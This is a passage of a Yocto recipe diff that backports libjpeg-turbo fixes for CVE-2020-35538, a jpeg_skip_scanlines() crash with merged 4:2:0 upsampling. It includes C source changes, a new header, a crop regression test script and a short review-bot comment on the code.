++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail,
++ JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
++ JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
++ if (master->using_merged_upsample && cinfo->post &&
++ cinfo->post->post_process_data) {
++ post_process_data = cinfo->post->post_process_data;
++ cinfo->post->post_process_data = noop_post_process;
++ }
++
+ for (n = 0; n < num_lines; n++)
+ jpeg_read_scanlines(cinfo, NULL, 1);
+
+@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
++
++ if (post_process_data)
++ cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+
+ /* Skipping is much simpler when context rows are not required. */
+@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+ }
+
+@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ return num_lines;
+ }
+
+@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/jdmerge.c b/jdmerge.c
+index dff5a35..833ad67 100644
+--- a/jdmerge.c
++++ b/jdmerge.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
+- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -40,41 +40,13 @@
+ #define JPEG_INTERNALS
+ #include "jinclude.h"
+ #include "jpeglib.h"
++#include "jdmerge.h"
+ #include "jsimd.h"
+ #include "jconfigint.h"
+
+ #ifdef UPSAMPLE_MERGING_SUPPORTED
+
+
+-/* Private subobject */
+-
+-typedef struct {
+- struct jpeg_upsampler pub; /* public fields */
+-
+- /* Pointer to routine to do actual upsampling/conversion of one row group */
+- void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
+-
+- /* Private state for YCC->RGB conversion */
+- int *Cr_r_tab; /* => table for Cr to R conversion */
+- int *Cb_b_tab; /* => table for Cb to B conversion */
+- JLONG *Cr_g_tab; /* => table for Cr to G conversion */
+- JLONG *Cb_g_tab; /* => table for Cb to G conversion */
+-
+- /* For 2:1 vertical sampling, we produce two output rows at a time.
+- * We need a "spare" row buffer to hold the second output row if the
+- * application provides just a one-row buffer; we also use the spare
+- * to discard the dummy last row if the image height is odd.
+- */
+- JSAMPROW spare_row;
+- boolean spare_full; /* T if spare buffer is occupied */
+-
+- JDIMENSION out_row_width; /* samples per output row */
+- JDIMENSION rows_to_go; /* counts rows remaining in image */
+-} my_upsampler;
+-
+-typedef my_upsampler *my_upsample_ptr;
+-
+ #define SCALEBITS 16 /* speediest right-shift on some machines */
+ #define ONE_HALF ((JLONG)1 << (SCALEBITS - 1))
+ #define FIX(x) ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
+@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
+ LOCAL(void)
+ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ int i;
+ JLONG x;
+ SHIFT_TEMPS
+@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ METHODDEF(void)
+ start_pass_merged_upsample(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Mark the spare buffer empty */
+ upsample->spare_full = FALSE;
+@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 2:1 vertical sampling case: may need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ JSAMPROW work_ptrs[2];
+ JDIMENSION num_rows; /* number of rows returned to caller */
+
+@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 1:1 vertical sampling case: much easier, never need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Just do the upsampling. */
+ (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
+@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ GLOBAL(void)
+ jinit_merged_upsampler(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample;
++ my_merged_upsample_ptr upsample;
+
+- upsample = (my_upsample_ptr)
++ upsample = (my_merged_upsample_ptr)
+ (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
+- sizeof(my_upsampler));
++ sizeof(my_merged_upsampler));
+ cinfo->upsample = (struct jpeg_upsampler *)upsample;
+ upsample->pub.start_pass = start_pass_merged_upsample;
+ upsample->pub.need_context_rows = FALSE;
+diff --git a/jdmerge.h b/jdmerge.h
+new file mode 100644
+index 0000000..b583396
+--- /dev/null
++++ b/jdmerge.h
+@@ -0,0 +1,47 @@
++/*
++ * jdmerge.h
++ *
++ * This file was part of the Independent JPEG Group's software:
++ * Copyright (C) 1994-1996, Thomas G. Lane.
++ * libjpeg-turbo Modifications:
++ * Copyright (C) 2020, D. R. Commander.
++ * For conditions of distribution and use, see the accompanying README.ijg
++ * file.
++ */
++
++#define JPEG_INTERNALS
++#include "jpeglib.h"
++
++#ifdef UPSAMPLE_MERGING_SUPPORTED
++
++
++/* Private subobject */
++
++typedef struct {
++ struct jpeg_upsampler pub; /* public fields */
++
++ /* Pointer to routine to do actual upsampling/conversion of one row group */
++ void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
++
++ /* Private state for YCC->RGB conversion */
++ int *Cr_r_tab; /* => table for Cr to R conversion */
++ int *Cb_b_tab; /* => table for Cb to B conversion */
++ JLONG *Cr_g_tab; /* => table for Cr to G conversion */
++ JLONG *Cb_g_tab; /* => table for Cb to G conversion */
++
++ /* For 2:1 vertical sampling, we produce two output rows at a time.
++ * We need a "spare" row buffer to hold the second output row if the
++ * application provides just a one-row buffer; we also use the spare
++ * to discard the dummy last row if the image height is odd.
++ */
++ JSAMPROW spare_row;
++ boolean spare_full; /* T if spare buffer is occupied */
++
++ JDIMENSION out_row_width; /* samples per output row */
++ JDIMENSION rows_to_go; /* counts rows remaining in image */
++} my_merged_upsampler;
++
++typedef my_merged_upsampler *my_merged_upsample_ptr;
++
++#endif /* UPSAMPLE_MERGING_SUPPORTED */
+diff --git a/jdmrg565.c b/jdmrg565.c
+index 1b87e37..53f1e16 100644
+--- a/jdmrg565.c
++++ b/jdmrg565.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright (C) 2013, Linaro Limited.
+- * Copyright (C) 2014-2015, 2018, D. R. Commander.
++ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+diff --git a/jdmrgext.c b/jdmrgext.c
+index b1c27df..c9a44d8 100644
+--- a/jdmrgext.c
++++ b/jdmrgext.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2011, 2015, D. R. Commander.
++ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+--
+2.25.1
+
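Review bot: `cinfo->upsample` is now cast to one of two private structs depending on `master->using_merged_upsample`, and that cast is repeated four times in `jpeg_skip_scanlines()` with no comment recording why. The bug being fixed was a write through the wrong struct type, so a comment at the first site would protect later edits, for example `/* cinfo->upsample is a my_merged_upsampler when using_merged_upsample is set; never write through my_upsample_ptr on that path */`. The new `jdmerge.h` also defines the struct without an include guard, so a second inclusion in one translation unit would fail to compile; wrapping it in `#ifndef JDMERGE_H` / `#define JDMERGE_H` / `#endif` would avoid that. `jpeg_skip_scanlines()` starts and ends outside the hunks shown.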
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
@@ -0,0 +1,400 @@
+From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Mon, 27 Jul 2020 14:21:23 -0500
+Subject: [PATCH] Further jpeg_skip_scanlines() fixes
+
+- Introduce a partial image decompression regression test script that
+ validates the correctness of jpeg_skip_scanlines() and
+ jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
+ settings.
+
+ This regression test catches the following issues:
+ #182, fixed in 5bc43c7
+ #237, fixed in 6e95c08
+ #244, fixed in 398c1e9
+ #441, fully fixed in this commit
+
+ It does not catch the following issues:
+ #194, fixed in 773040f
+ #244 (additional segfault), fixed in
+ 9120a24
+
+- Modify the libjpeg-turbo regression test suite (make test) so that it
+ checks for the issue reported in #441 (segfault in
+ jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
+ conversion.)
+
+- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
+ h2v2 (4:2:0) merged upsampling/color conversion. The previous commit
+ fixed the segfault reported in #441, but that was a symptom of a
+ larger problem. Because merged 4:2:0 upsampling uses a "spare row"
+ buffer, it is necessary to allow the upsampler to run when skipping
+ rows (fancy 4:2:0 upsampling, which uses context rows, also requires
+ this.) Otherwise, if skipping starts at an odd-numbered row, the
+ output image will be incorrect.
+
+- Throw an error if jpeg_skip_scanlines() is called with two-pass color
+ quantization enabled. With two-pass color quantization, the first
+ pass occurs within jpeg_start_decompress(), so subsequent calls to
+ jpeg_skip_scanlines() interfere with the multipass state and prevent
+ the second pass from occurring during subsequent calls to
+ jpeg_read_scanlines().
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ CMakeLists.txt | 9 +++--
+ ChangeLog.md | 15 +++++---
+ croptest.in | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
+ jdapistd.c | 70 +++++++++++--------------------------
+ libjpeg.txt | 6 ++--
+ 5 files changed, 136 insertions(+), 59 deletions(-)
+ create mode 100755 croptest.in
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index aee74c9..de451f4 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -753,7 +753,7 @@ else()
+ set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
+ set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
+ set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
+- set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
++ set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
+ set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
+ set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
+ set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
+@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
+
+ if(WITH_ARITH_DEC)
+ # CC: RGB->YCC SAMP: h2v2 merged IDCT: ifast ENT: arith
+- add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
++ add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
+ testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
+ ${MD5_PPM_420M_IFAST_ARI})
+
+@@ -1266,6 +1266,11 @@ endforeach()
+ add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
+ ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
+
++configure_file(croptest.in croptest @ONLY)
++add_custom_target(croptest
++ COMMAND echo croptest
++ COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
++
+ if(WITH_TURBOJPEG)
+ configure_file(tjbenchtest.in tjbenchtest @ONLY)
+ configure_file(tjexampletest.in tjexampletest @ONLY)
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 19d18fa..4562eff 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
+-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
+-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
+-images using the merged (non-fancy) upsampling algorithms (that is, when
+-setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
+-but it did not cover all cases.
++2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
++
++ - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
++errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
++4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
++is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a
++similar fix, but it did not cover all cases.
++ - `jpeg_skip_scanlines()` now throws an error if two-pass color
++quantization is enabled. Two-pass color quantization never worked properly
++with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
+
+
+ 2.0.3
+diff --git a/croptest.in b/croptest.in
+new file mode 100755
+index 0000000..7e3c293
+--- /dev/null
++++ b/croptest.in
+@@ -0,0 +1,95 @@
++#!/bin/bash
++
++set -u
++set -e
++trap onexit INT
++trap onexit TERM
++trap onexit EXIT
++
++onexit()
++{
++ if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++ fi
++}
++
++runme()
++{
++ echo \*\*\* $*
++ $*
++}
++
++IMAGE=vgl_6548_0026a.bmp
++WIDTH=128
++HEIGHT=95
++IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
++OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
++EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
++
++if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++fi
++mkdir -p $OUTDIR
++
++exec >$EXEDIR/croptest.log
++
++echo "============================================================"
++echo "$IMAGE ($WIDTH x $HEIGHT)"
++echo "============================================================"
++echo
++
++for PROGARG in "" -progressive; do
++
++ cp $IMGDIR/$IMAGE $OUTDIR
++ basename=`basename $IMAGE .bmp`
++ echo "------------------------------------------------------------"
++ echo "Generating test images"
++ echo "------------------------------------------------------------"
++ echo
++ runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
++ echo
++
++ for NSARG in "" -nosmooth; do
++
++ for COLORSARG in "" "-colors 256 -dither none -onepass"; do
++
++ for Y in {0..16}; do
++
++ for H in {1..16}; do
++
++ X=$(( (Y*16)%128 ))
++ W=$(( WIDTH-X-7 ))
++ if [ $Y -le 15 ]; then
++ CROPSPEC="${W}x${H}+${X}+${Y}"
++ else
++ Y2=$(( HEIGHT-H ));
++ CROPSPEC="${W}x${H}+${X}+${Y2}"
++ fi
++
++ echo "------------------------------------------------------------"
++ echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
++ echo "------------------------------------------------------------"
++ echo
++ for samp in GRAY 420 422 440 444; do
++ $EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
++ convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
++ runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++ done
++ echo
++
++ done
++
++ done
++
++ done
++
++ done
++
++done
++
++echo SUCCESS!
+diff --git a/jdapistd.c b/jdapistd.c
+index 91da642..c502909 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
+-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
+-LOCAL(void)
+-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
+- JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+-{
+-}
+-
+-
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ JSAMPARRAY scanlines = NULL;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
+- void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION *in_row_group_ctr,
+- JDIMENSION in_row_groups_avail,
+- JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
+- JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
+- if (master->using_merged_upsample && cinfo->post &&
+- cinfo->post->post_process_data) {
+- post_process_data = cinfo->post->post_process_data;
+- cinfo->post->post_process_data = noop_post_process;
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ scanlines = &upsample->spare_row;
+ }
+
+ for (n = 0; n < num_lines; n++)
+- jpeg_read_scanlines(cinfo, NULL, 1);
++ jpeg_read_scanlines(cinfo, scanlines, 1);
+
+ if (color_convert)
+ cinfo->cconvert->color_convert = color_convert;
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
+-
+- if (post_process_data)
+- cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
+ {
+ JDIMENSION rows_left;
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
++
++ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++ read_and_discard_scanlines(cinfo, rows);
++ return;
++ }
+
+ /* Increment the counter to the next row group after the skipped rows. */
+ main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
+@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+ my_master_ptr master = (my_master_ptr)cinfo->master;
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+ JDIMENSION lines_to_skip, lines_to_read;
+
++ /* Two-pass color quantization is not supported. */
++ if (cinfo->quantize_colors && cinfo->two_pass_quantize)
++ ERREXIT(cinfo, JERR_NOTIMPL);
++
+ if (cinfo->global_state != DSTATE_SCANNING)
+ ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
+
+@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->spare_full = FALSE;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample) {
+ upsample->next_row_out = cinfo->max_v_samp_factor;
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+ }
+@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- if (master->using_merged_upsample) {
